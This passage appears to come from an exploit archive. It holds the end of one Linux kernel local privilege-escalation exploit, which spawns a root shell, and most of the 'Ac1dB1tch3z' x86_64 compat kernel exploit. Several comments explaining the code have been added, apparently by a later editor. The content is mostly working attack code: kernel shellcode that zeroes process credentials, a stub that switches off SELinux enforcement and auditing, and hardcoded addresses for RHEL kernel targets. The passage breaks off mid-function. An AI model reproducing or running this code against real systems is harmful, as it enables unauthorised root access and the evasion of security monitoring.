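    *          if (likely(up->pending)) {
    *                    if (unlikely(up->pending != AF_INET)) {
    *                            release_sock(sk);
    *                            return -EINVAL;
    *                    }
    *                    goto do_append_data;
    *            }
    *            release_sock(sk);
    *    }
    *
    * The sendmsg() results are ignored on purpose: they say nothing
    * reliable about whether the callback ran, so success is judged by the
    * effect on our credentials.
    */
   sendmsg(s, &header, MSG_MORE|MSG_PROXY);
   sendmsg(s, &header, 0);

   close(s);

   if (getuid() == orig_uid) {
      fprintf(stderr, "[*] exploit failed, uid unchanged\n");
      return 1;
   }

   /* exec rather than system(): no intermediate "sh -c", and the shell replaces this process. */
   execl("/bin/sh", "sh", "-i", NULL);
   perror("execl");
   return 1;
}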

// milw0rm.com [2009-09-02]


Ac1dB1tCh3z/Linux Kernel 2.6.27+ x86_64 compat exploit ( linux)

/*

Ac1dB1tch3z Vs Linux Kernel x86_64 0day

Today is a sad day..

R.I.P.  
Tue, 29 Apr 2008  /  Tue, 7 Sep 2010

a bit of history: 
MCAST_MSFILTER Compat mode bug found... upon commit! (2 year life on this one) 

author    David L Stevens <dlstevens () us ibm com>    
    Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
committer    David S. Miller <davem () davemloft net>    
    Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
This patch adds support for getsockopt for MCAST_MSFILTER for
both IPv4 and IPv6. It depends on the previous setsockopt patch,
and uses the same method.

Signed-off-by: David L Stevens <dlstevens () us ibm com>
Signed-off-by: YOSHIFUJI Hideaki <yoshfuji () linux-ipv6 org>
Signed-off-by: David S. Miller <davem () davemloft net>
------------------------------------------------------------                

Thank you for signing-off on this one guys. 

This exploit has been tested very thoroughly
over the course of the past few years on many many targets.

Thanks to Red Hat for backporting it into earlier kernel versions
(anything from late August 2008 onward).

Ac1dB1tch3z would like to say F*** YOU Ben Hawkes. You are a new hero! You saved the
plan8 man. Just a bit too l8.

PS:
OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. (same thing right ;))

*/

#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h> 
#include <sys/msg.h>
#include <errno.h>


#ifndef __i386__
#error "r34d th3 c0d3 m0r0n!!# () #"
#else
#define _GNU_SOURCE   /* NOTE(review): defined after the #includes above, so it has no effect on them */
#define __dgdhdytrg55 unsigned int                /* obfuscated alias: 32-bit unsigned */
#define __yyrhdgdtfs66ytgetrfd unsigned long long /* obfuscated alias: 64-bit unsigned (kernel addresses) */
#define __dhdyetgdfstreg__ memcpy                 /* obfuscated alias for memcpy */

#define VERT                  "\033[32m"
#define NORM                  "\033[0m"
#define BANNER                VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n"

/* Files read and kernel symbols resolved by this exploit. */
#define KALLSYMS              "/proc/kallsyms"          /* symbol source when readable (get_sym) */
#define TMAGIC_66TDFDRTS      "/proc/timer_list"        /* opened and poll()ed in main to exercise the patched fops */
#define SELINUX_PATH          "/selinux/enforce"        /* probed by isSelinuxEnabled() */
#define RW_FOPS               "timer_list_fops"         /* the file_operations table the fops vector overwrites */
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"   /* per-cpu offset patched into both stage-1 payloads */
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"           /* three cred helpers patched into the cred-based */
#define OVERRIDE_GGDTSGFSRFSD "override_creds"          /* stage-2 payload (2.6.x with x >= 29) */
#define REVERT_DHDGTRRTEFDTD  "revert_creds"
/* Fixed user-space addresses: a fake stack page and a code page, both mapped
 * MAP_FIXED in y0y0stack()/y0y0code().  J0J0S and J0J0R00T live in the code page. */
#define Y0Y0SMAP              0x100000UL                /* fake stack page */
#define Y0Y0CMAP              0x200000UL                /* code page */
#define Y0Y0STOP              (Y0Y0SMAP+0xFFC)          /* top of the fake stack, esp during the getsockopt calls */
#define J0J0S                 0x00200000UL              /* stage-1 code (start of the code page) */
#define J0J0R00T              0x002000F0UL              /* stage-2 code, 0xF0 bytes into the same page */
#define PAGE_SIZE             0x1000

/* Bits of the global `flags` (set in put_your_hands_up_hooker / env_prepare). */
#define KERN_DHHDYTMLADSFPYT     0x1   /* kernel keeps current_task per-cpu (2.6.x, x >= 30) */
#define KERN_DGGDYDTEGGETFDRLAK  0x2   /* kernel uses struct cred (2.6.x, x >= 29) */
#define KERN_HHSYPPLORQTWGFD     0x4   /* /proc/kallsyms is readable */


#define KERN_DIS_GGDYYTDFFACVFD_IDT      0x8    /* do not use the IDT vector */
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS     0x10  /* do not use the fops vector */
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM      0x20  /* do not use the LSM (RHEL) vector */

#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX  0x40  /* -s: also zero selinux_enforcing/audit_enabled */

#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))  /* release string looks like RHEL 4/5 */

#define TRY_REMAP_DEFAULT 1   /* map the code page RW, then remap it RX through a temp file (rey0y0code) */

/* Output helpers.  The last two hand their argument to fprintf as the format
 * string; every caller in this file passes a string literal without '%'. */
#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];                 /* optval handed to getsockopt(); filled by __setmcbuffer() */
static int s;                             /* the AF_INET/SOCK_DGRAM socket the getsockopt calls go through */
static int flags=0;                       /* KERN_* bits */
volatile static socklen_t magiclen=0;     /* optlen passed to getsockopt(); computed by get_socklen() */
static int useidt=0, usefops=0, uselsm=0; /* which write vector main() fires; at most one is used */
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0}; /* timer_list_fops; prepare/override/revert_creds */
static __dgdhdytrg55 _m_cpu_off=0;        /* per_cpu__current_task offset */
static char krelease[64];                 /* uname release/version, filled by wtfyourunhere_heee() */
static char kversion[128];

/* Stage-2 payload, classic variant (kernels without struct cred).  Decoded
 * from the bytes: starting at rdi (stage 1 loads current's task_struct there)
 * it scans up to 0x44c dwords for four consecutive dwords equal to the value
 * at offset R0C_0FF and stores zero over all four.  main() writes our uid over
 * that 0x41414141 immediate, so the four matched fields are presumably
 * uid/euid/suid/fsuid. */
#define R0C_0FF 14
static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"  
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"   
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"     
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"                   
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";               


/* Stage-2 payload, struct-cred variant.  The three 8-byte immediates at the
 * offsets below are patched with prepare_creds, override_creds and
 * revert_creds (put_your_hands_up_hooker).  Decoded: call prepare_creds(),
 * override_creds() with the result, store 32-bit zeros at +4 and +0x14 of the
 * cred override_creds() returned (uid/euid, presumably), then revert_creds(). */
#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"                                 
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"  
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"                              
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"   
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";                                       


/* Stage-1 payload for the fops and LSM vectors (runs as a kernel function
 * call, returns with ret).  Patch points: +7 the 32-bit gs-relative
 * per_cpu__current_task offset (mov rdi, gs:[off]), +13 the 8-byte address of
 * stage 2 (J0J0R00T, called via rax), +25 the start of a NOP sled into which
 * p4tch_sel1nux_codztegfaddczda() copies the SELinux-disable stub. */
#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                      
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";


/* implement selinux bypass for IDT ! */
/* Stage-1 payload for the IDT vector (runs as an interrupt handler entered
 * from user mode: swapgs on entry and exit, iretq at the end).  Same patch
 * points as ttrfd0, shifted by the 3-byte swapgs: +8 per-cpu offset, +14 the
 * stage-2 address, +27 the NOP sled for the SELinux stub. */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"      
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                                  
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";  



/* SELinux-disable stub (37 bytes, spliced into the sleds above).  Decoded:
 * save r10/rax, eax = 0, store eax through r10 at the address patched in at
 * +10 (selinux_enforcing) and again at +23 (audit_enabled), restore. */
#define CJE_4554TFFDTRMAJHD_OFF  10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF      23
static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";           




/* rhel LSM stuffs */
/* Index (in 8-byte pointers) of the security_ops hook that main() overwrites
 * in each of the three ops tables; msgctl(IPC_RMID) is what triggers it. */
#define RHEL_LSM_OFF 98

/* Kernel addresses needed by the LSM vector and the SELinux patch, either
 * from the built-in known_targets table or resolved from System.map. */
struct LSM_rhel 
{ 
  __yyrhdgdtfs66ytgetrfd selinux_ops;          /* the three security_ops tables */
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;

  __yyrhdgdtfs66ytgetrfd selinux_enforcing;    /* zeroed by the -s stub */
  __yyrhdgdtfs66ytgetrfd audit_enabled;

  const char *krelease;                        /* uname release/version this entry matches; */
  const char *kversion;                        /* left NULL for the System.map-derived entry */
 
};

/* Built-in address tables for specific RHEL 5 kernel builds, matched on both
 * uname release and version strings (lsm_rhel_find_target).  Any other build
 * falls back to /boot/System.map-<release>.  Note that entries 2 and 4 carry
 * identical addresses and release; only the version string differs. */
struct LSM_rhel known_targets[4]=
{
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,

    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

    "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,

   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

   "2.6.18-164.11.1.el5",
   "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,

    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,

    "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops

    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled

    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
   }

};

/* curr_target: the table in use (NULL until found); the second is scratch for a System.map-derived entry. */
static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;

/* Argument block for socketcall(SYS_GETSOCKOPT).  The i386 socketcall ABI
 * takes a pointer to a packed array of the call's arguments, which is why the
 * struct is packed and why bitch_call() passes its address in ecx.  optlen
 * points at the global magiclen (declared volatile by the author, presumably
 * because the kernel writes back through it). */
struct socketcallAT
{
  int s;
  int level;
  int optname;
  void *optval;
  volatile socklen_t *optlen;  
}__attribute__((packed));

/* Image stored by `sidt` in a 32-bit process: 16-bit limit followed by a
 * 32-bit base (unsigned long is 4 bytes on the i386 build this file demands).
 * getidt() widens the base into the kernel half of the 64-bit address space. */
struct idt64from32_s 
{
  unsigned short limit;
  unsigned long base;
}__attribute__((packed));

/* Read the IDT base with `sidt` and return it as a 64-bit kernel address:
 * the 32-bit base the instruction stores is OR'ed with 0xFFFFFFFF00000000,
 * i.e. the upper half is assumed to be all ones. */
static __yyrhdgdtfs66ytgetrfd getidt()
{
  struct idt64from32_s idt;
  memset(&idt, 0x00, sizeof(struct idt64from32_s));
  asm volatile("sidt %0" : "=m"(idt));
  return idt.base | 0xFFFFFFFF00000000ULL;
}


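/*
 * Probe SELINUX_PATH ("/selinux/enforce").
 *
 * Returns 1 when the file opens, or when it exists but the open was refused
 * for permission reasons (EACCES or EPERM); returns 0 when it is absent or the
 * open fails for any other reason.  The original accepted only EPERM, but a
 * permission-denied open() reports EACCES, so an enforce node that exists yet
 * is unreadable was reported as "SELinux not enabled".
 */
static int isSelinuxEnabled()
{
  FILE *selinux_f = fopen(SELINUX_PATH, "r");

  if(selinux_f == NULL)
    return (errno == EACCES || errno == EPERM) ? 1 : 0;

  fclose(selinux_f);
  return 1;
}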

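/*
 * Fill out_release/out_version from uname(2) and return the third dotted
 * component of the release string (18 for "2.6.18-164.el5"), which the
 * callers use as the 2.6.x level.
 *
 * out_release must hold 64 bytes and out_version 128 (the globals
 * krelease/kversion, the only caller's arguments); the copies are truncated
 * to those sizes - utsname fields can be 65 bytes including the NUL, one
 * more than krelease, so the original strcpy could overrun by a byte.  The
 * digit scratch buffer is bounded as well.
 *
 * Returns -1 when uname() fails or no digits follow the second '.'.  A real
 * "0" component is returned as 0 (the original treated it as a failure).
 */
static int wtfyourunhere_heee(char *out_release, char* out_version)
{
  struct utsname buf;
  const char *ptr;
  char digits[32];
  size_t nd = 0;
  int dots = 0;

  if(uname(&buf) < 0)
    return -1;

  /* krelease is 64 bytes, kversion 128: bound the copies to those sizes. */
  snprintf(out_release, 64, "%s", buf.release);
  snprintf(out_version, 128, "%s", buf.version);

  /* Skip two '.'-separated components, then collect the digits that follow. */
  for(ptr = buf.release; *ptr; ptr++)
  {
    if(dots == 2)
    {
      if(*ptr >= '0' && *ptr <= '9' && nd < sizeof(digits) - 1)
        digits[nd++] = *ptr;
      else
        break;
    }
    if(*ptr == '.')
      dots++;
  }
  digits[nd] = '\0';

  if(nd == 0)
    return -1;

  return atoi(digits);
}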


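/*
 * Patch the selinux_enforcing and audit_enabled addresses into the
 * SELinux-disable stub and splice the stub into the NOP sled of both stage-1
 * payloads (the fops/LSM variant ttrfd0 and the IDT variant
 * ruujhdbgatrfe345).
 *
 * The 8-byte immediates are written with memcpy: the patch offsets (10 and
 * 23) are not 8-byte aligned, so the original cast-and-store was a misaligned
 * access through an incompatible pointer type.  Byte order is unchanged
 * (memcpy copies the native representation the original stored).
 *
 * table must be non-NULL; the callers in main() only reach this when a
 * target table was found (env_prepare clears the -s flag otherwise).
 */
static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
  __dhdyetgdfstreg__(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF,
                     &table->selinux_enforcing, sizeof(table->selinux_enforcing));
  __dhdyetgdfstreg__(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF,
                     &table->audit_enabled, sizeof(table->audit_enabled));

  /* sizeof-1 drops the string NUL; both sleds are long enough for the 37-byte stub. */
  __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
  __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
}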


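/*
 * Look up symbol `s` in a kallsyms / System.map style file ("ADDR T NAME" per
 * line) and return its address, or 0 when the file cannot be opened, the
 * symbol is absent, or (unless ignore_flag) /proc/kallsyms was found
 * unreadable at startup (KERN_HHSYPPLORQTWGFD clear in `flags`).
 *
 * Fixes against the original: the FILE* is closed on every path (it leaked on
 * both returns), the address and name scanners stop at the end of the line
 * instead of running past a line that has no blank, the 3-byte skip over the
 * type column cannot step past the terminator, and both scratch buffers are
 * always NUL-terminated.
 */
static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag)
{
  FILE *ka;
  char line[512];
  char reloc_a[64];
  char reloc[64];
  __yyrhdgdtfs66ytgetrfd addr = 0;

  if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
    return 0;

  ka = fopen(filename, "r");
  if(!ka)
    return 0;

  while(fgets(line, sizeof(line), ka) != NULL)
  {
    const char *l_p = line;
    size_t n = 0;

    /* address: up to the first blank */
    while(*l_p && *l_p != ' ' && *l_p != '\n' && n < sizeof(reloc_a) - 1)
      reloc_a[n++] = *l_p++;
    reloc_a[n] = '\0';

    /* skip " T " (blank, type letter, blank), but never past the end */
    for(n = 0; n < 3 && *l_p; n++)
      l_p++;

    /* name: up to blank, tab or newline */
    n = 0;
    while(*l_p && *l_p != ' ' && *l_p != '\n' && *l_p != '\t' && n < sizeof(reloc) - 1)
      reloc[n++] = *l_p++;
    reloc[n] = '\0';

    if(!strcmp(reloc, s))
    {
      __gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a);
      addr = strtoull(reloc_a, NULL, 16);
      break;
    }
  }

  fclose(ka);
  return addr;
}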


/* Resolve `s` from /proc/kallsyms; returns 0 when kallsyms was not readable
 * at startup (the readability flag is honoured, not ignored). */
static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)
{
  const int honour_readability_flag = 0;
  return get_sym_ex(s, KALLSYMS, honour_readability_flag);
}

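/*
 * Parse the -c argument "PREPARE,OVERRIDE,REVERT" (three hex addresses) into
 * _m_cred[0..2].
 *
 * Returns 0 on success, -1 when a field is empty, longer than 63 characters,
 * not a clean hex number, or the input ends before the third field.  The
 * original copied each field into a 64-byte stack buffer with no bound and
 * accepted anything strtoull would partially parse.  On -1 the entries
 * already parsed may have been written.
 */
static int parse_cred(const char* val)
{
  const char *p = val;
  int i;

  for(i = 0; i < 3; i++)
  {
    char local[64];
    char *end;
    size_t n = 0;

    while(*p && *p != ',')
    {
      if(n >= sizeof(local) - 1)
        return -1;           /* field too long for the scratch buffer */
      local[n++] = *p++;
    }
    local[n] = '\0';

    if(n == 0)
      return -1;             /* empty field */

    if(!(*p) && i != 2)
      return -1;             /* input ended before the third field */

    errno = 0;
    _m_cred[i] = strtoull(local, &end, 16);
    if(*end != '\0' || errno == ERANGE)
      return -1;             /* trailing garbage or out of range */

    if(*p == ',')
      p++;
  }

  return 0;
}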


/* System.map names resolved by lsm_rhel_find_target() when the running
 * kernel is not one of the known_targets entries. */
#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

/*
 * Pick the LSM address table for the running kernel.
 *
 * With check_rhel set, a release string that does not look like RHEL 4/5
 * (".el4"/".el5") is rejected outright.  known_targets is matched on both the
 * release and the version string; failing that, the five symbols are resolved
 * from /boot/System.map-<release> into a static scratch entry (whose
 * krelease/kversion stay NULL).  Returns NULL when any symbol is missing.
 */
struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
   const size_t ntargets = sizeof(known_targets)/sizeof(struct LSM_rhel);
   struct LSM_rhel *dyn = &dyn4nt4n1labeggeyrthryt;
   char mapbuf[128];
   size_t idx;

   if(check_rhel && !isRHHGDPPLADSF(krelease))
   {
     __pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n");
     return NULL;
   }

   __pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n");
   for(idx = 0; idx < ntargets; idx++)
   {
     struct LSM_rhel *cand = &known_targets[idx];
     if(strcmp(krelease, cand->krelease) != 0)
       continue;
     if(strcmp(kversion, cand->kversion) != 0)
       continue;
     __gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s \n", cand->krelease, cand->kversion);
     return cand;
   }

   __pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n");
   /* "/boot/System.map-" (17) + krelease (at most 63) fits comfortably in 128 */
   snprintf(mapbuf, sizeof(mapbuf), "/boot/System.map-%s", krelease);

   dyn->selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
   dyn->dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
   dyn->capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
   dyn->selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
   dyn->audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);

   if(dyn->selinux_ops && dyn->dummy_security_ops && dyn->capability_ops &&
      dyn->selinux_enforcing && dyn->audit_enabled)
     return dyn;

   return NULL;
}

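/*
 * Probe the environment and parse the command line.
 *
 *  - records in `flags` whether /proc/kallsyms is readable
 *    (KERN_HHSYPPLORQTWGFD), fills krelease/kversion and derives the 2.6.x
 *    level `ver` (fatal if the release cannot be parsed);
 *  - options: -i force the IDT vector (disables fops and LSM), -f fops only
 *    (disables IDT and LSM), -l LSM only (disables IDT and fops),
 *    -c a,b,c prepare/override/revert_creds addresses, -k timer_list_fops
 *    address, -o per_cpu__current_task offset, -s also disable SELinux;
 *  - ver >= 29: the cred-based stage 2 is selected and the three cred
 *    symbols are patched into r1ngrrrrrrr (resolved via kallsyms unless all
 *    three were given with -c);
 *  - ver >= 30: the per-cpu offset is patched into both stage-1 payloads.
 *
 * Fixes against the original: the kallsyms probe no longer read()s from and
 * close()s a descriptor that may be -1, an unknown option is fatal instead of
 * silently ignored (this program patches the kernel irreversibly, a typo'd
 * flag should not run), and the per-cpu failure message no longer repeats the
 * cred one.
 */
static void put_your_hands_up_hooker(int argc, char *argv[])
{
  int fd,ver,ret;
  char probe[16];

  fd = open(KALLSYMS, O_RDONLY);
  if(fd >= 0)
  {
    ret = read(fd, probe, sizeof(probe)); // dummy read: "readable" means it returns data
    if(ret > 0)
    {
      __pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0
      flags |= KERN_HHSYPPLORQTWGFD;
    }
    close(fd);
  }

  ver = wtfyourunhere_heee(krelease, kversion);
  if(ver < 0)
    __yyy_tegdtfsrer("!!!  Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n");

  __gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease);

  if(argc != 1)
  {
    while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0)
    {
      switch(ret)
      {
        case 'i':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
          useidt=1; // u have to use -i to force IDT Vector
          break;

        case 'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;

        case 'l':
          flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
          break;

        case 'c':
          if(!optarg || parse_cred(optarg) < 0)
              __yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n");
          break;

        case 'k':
          if(optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
            __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rs\n");
          break;

        case 's':
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;

        case 'o':
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
          else
            __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
          break;

        default:
          /* getopt has already printed its own diagnostic for '?' */
          __yyy_tegdtfsrer("!!! Unkn0wn 0pt10n\n");
      }
    }
  }

  if(ver >= 29) // needs cred structure 
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;

    /* -c must supply all three; otherwise resolve them from kallsyms */
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
    {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD); 
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }

    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
      __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");

    __pppp_tegddewyfg("$$$ Kernel Credentials detected\n");
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
  }

  if(ver >= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
      _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);

    if(!_m_cpu_off) 
      __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng p3r_cpu 0ffs3t\n");

    __pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}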


/*
 * Decide which kernel-write vector main() will fire, in order of preference:
 * timer_list_fops (unless disabled or unresolvable), then the RHEL LSM tables
 * (unless disabled or no target); -i forces the IDT vector.  With -i and -s a
 * target table is still needed for the SELinux stub; if none is found the -s
 * request is dropped.  Fatal if no vector is available.
 */
static void env_prepare(int argc, char* argv[])
{
  put_your_hands_up_hooker(argc, argv);

  /* 1. fops vector */
  if((flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS) == 0)
  {
    __pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n");
    if(_m_fops == 0)
      _m_fops = get_sym(RW_FOPS);

    /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
     * Thanks to the guy who killed this vector... you know who you are:)
     * Lucky for you, there are more:) 
     */
    if(_m_fops != 0)
    {
      usefops = 1;
      __pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n");
    }
  }

  /* 2. LSM (RHEL) vector, only when fops was not chosen */
  if(usefops == 0 && (flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM) == 0)
  {
    curr_target = lsm_rhel_find_target(1);
    if(curr_target != NULL)
      uselsm = 1;
    else
      __pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n"); 
  }

  /* 3. -i together with -s: the SELinux stub needs a target table too */
  if(useidt != 0 && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) != 0)
  {
    curr_target = lsm_rhel_find_target(0);
    if(curr_target == NULL)
    {
       __pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n");
       flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;   /* drop the -s request */
    }
  }

